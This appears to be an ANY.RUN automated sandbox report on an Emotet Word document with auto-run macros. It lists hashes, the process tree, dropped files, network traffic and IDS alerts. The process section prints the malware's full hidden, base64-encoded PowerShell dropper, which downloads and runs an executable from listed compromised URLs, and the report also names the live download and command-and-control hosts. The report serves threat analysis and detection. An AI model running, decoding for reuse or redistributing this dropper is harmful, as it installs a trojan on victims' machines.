analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

7uo0t4osm95p

Full analysis: https://app.any.run/tasks/e941d34f-79fc-4f15-83f9-6b7b29df5ff6
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 17:00:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Quasi fuga hic., Author: Arwen Hehl, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 16:28:00 2019, Last Saved Time/Date: Fri Dec 6 16:28:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 336, Security: 0
MD5:

360F5A12B240906243F5FB518E8E9F57

SHA1:

7B916190C38AA6CD313022E8F4B3810516C940FE

SHA256:

D722D33E1B4CB417F6466F237F011FA499717AD73F5E0328662059560A9A88BA

SSDEEP:

6144:D7AtOKO+FT7q52k4etGiL3HJkEyD7bFRDvys0Deb:D7AtOKO+FT7q53Qitk/7bFRZ0Deb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 47.exe (PID: 3092)
      • 47.exe (PID: 2128)
      • serialfunc.exe (PID: 748)
      • serialfunc.exe (PID: 2176)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 896)
    • Emotet process was detected

      • 47.exe (PID: 2128)
    • Connects to CnC server

      • serialfunc.exe (PID: 2176)
    • EMOTET was detected

      • serialfunc.exe (PID: 2176)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 2176)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 896)
    • PowerShell script executed

      • powershell.exe (PID: 896)
    • Creates files in the user directory

      • powershell.exe (PID: 896)
    • Starts itself from another location

      • 47.exe (PID: 2128)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 896)
      • 47.exe (PID: 2128)
    • Application launched itself

      • serialfunc.exe (PID: 748)
    • Connects to server without host name

      • serialfunc.exe (PID: 2176)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 932)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 932)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 896)
      • 47.exe (PID: 2128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Quasi fuga hic.
Subject: -
Author: Arwen Hehl
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:06 16:28:00
ModifyDate: 2019:12:06 16:28:00
Pages: 1
Words: 58
Characters: 336
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 393
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 47.exe no specs #EMOTET 47.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7uo0t4osm95p.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
896powershell -w hidden -en JABYAGgAZABlAGQAYQBiAHoAbgB1AGEAYQA9ACcAVwB4AGcAaQBiAHcAYwBuAHgAdwAnADsAJABLAHkAcgB1AGIAdQBxAGsAbgB0ACAAPQAgACcANAA3ACcAOwAkAEoAYgByAGYAaABuAGwAcwBnAGcAbAByAD0AJwBZAHYAcQB4AHIAeQBzAHkAdABkAGYAJwA7ACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAeQByAHUAYgB1AHEAawBuAHQAKwAnAC4AZQB4AGUAJwA7ACQATwBrAGsAaABkAG8AZgByAHkAdgA9ACcATQBrAHEAcQBxAHUAcQBuAGoAZQBzAGcAJwA7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAEMATABpAEUATgB0ADsAJABVAHAAeQB4AG0AdgBmAHMAcABuAGIAdQA9ACcAaAB0AHQAcAA6AC8ALwByAG0AYwBlAG4AdAByAGUALgBiAGkAZwBmAGkAbABtAHAAcgBvAGQAdQBjAHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwAcgBPAHEAaAAvACoAaAB0AHQAcAA6AC8ALwBsAGUAYwBhAGQAZQBhAHUAZwBvAHUAcgBtAGEAbgBkAC4AZgByAC8ANAA3AG0AbgAwADQALwBvAFMAOABEAGsAVgAvACoAaAB0AHQAcAA6AC8ALwBkAGEAdABuAGUAbgB0AGEAeQBoAGEAbgBvAGkALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAB5AFoAcgBkAGQAZwAvACoAaAB0AHQAcAA6AC8ALwBiAGkAZQB0AHQAaAB1AHYAaQBuAGgAbwBtAGUAcwBnAGkAYQBsAGEAbQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAGEAYwBCADQAcQA0AHkALwAqAGgAdAB0AHAAOgAvAC8AYwBsAGkAYwBrAGIAYQBuAGsAYgByAGUAYQBrAHMAdABoAGUAaQBuAHQAZQByAG4AZQB0AC4AYwBvAG0ALwBvAEEANgBlAG4ASQA4AC8AJwAuACIAUwBwAGAATABJAHQAIgAoACcAKgAnACkAOwAkAFEAYwBsAGkAbwBhAHAAZQB3AGkAPQAnAEkAZABoAHYAYQB6AGEAZQBmAG4AYgBoAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAaAB3AGQAbwBsAGEAdwBoAHUAcwBqAHYAIABpAG4AIAAkAFUAcAB5AHgAbQB2AGYAcwBwAG4AYgB1ACkAewB0AHIAeQB7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAC4AIgBEAG8AYAB3AG4AYABsAE8AYABBAEQAZgBpAEwARQAiACgAJABLAGgAdwBkAG8AbABhAHcAaAB1AHMAagB2ACwAIAAkAEIAcwBhAHQAYwBxAG4AagBwAHYAbgBvACkAOwAkAEUAegBrAHIAZABpAHQAeABkAGcAcQA9ACcARQBoAG8AaQB1AHMAbQBuAGYAbgBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADQANwAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAHQAIgAoACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQA7ACQARQBkAGEAZABmAGYAbABrAGYAbABxAHMAPQAnAEYAZQBwAGoAcgBsAHoAeAB5AHQAbQAnADsAYgByAGUAYQBrADsAJABCAHkAbABnAHkAeABuAHAAdABjAGMAbABjAD0AJwBDAGQAcgBjAGMAeABoAGIAeQB1AGIAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGgAcgB1AGoAagBtAHQAZQA9ACcAQwB6AGwAYwBuAHkAcABoAGYAdQB2AGIAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3092"C:\Users\admin\47.exe" C:\Users\admin\47.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2128--c57b844dC:\Users\admin\47.exe
47.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
748"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe47.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2176--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 256
Read events
1 425
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA775.tmp.cvr
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CC4B2E4.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D87ED95.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC1D6E92.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43CEC96B.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8133DC70.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C066D1B1.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\370E2BFE.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD0D6FE7.wmf
MD5:
SHA256:
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1D3B8BC.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2176
serialfunc.exe
POST
200
107.2.2.28:80
http://107.2.2.28/K7hdD0Ii6U
US
binary
132 b
malicious
896
powershell.exe
GET
200
206.221.182.74:80
http://rmcentre.bigfilmproduction.com/wp-includes/LrOqh/
US
executable
464 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2176
serialfunc.exe
107.2.2.28:80
Comcast Cable Communications, LLC
US
malicious
896
powershell.exe
206.221.182.74:80
rmcentre.bigfilmproduction.com
Choopa, LLC
US
malicious

DNS requests

Domain
IP
Reputation
rmcentre.bigfilmproduction.com
  • 206.221.182.74
malicious

Threats

PID
Process
Class
Message
896
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
896
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
896
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2176
serialfunc.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
2176
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
2176
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
2176
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1 ETPRO signatures available at the full report
No debug info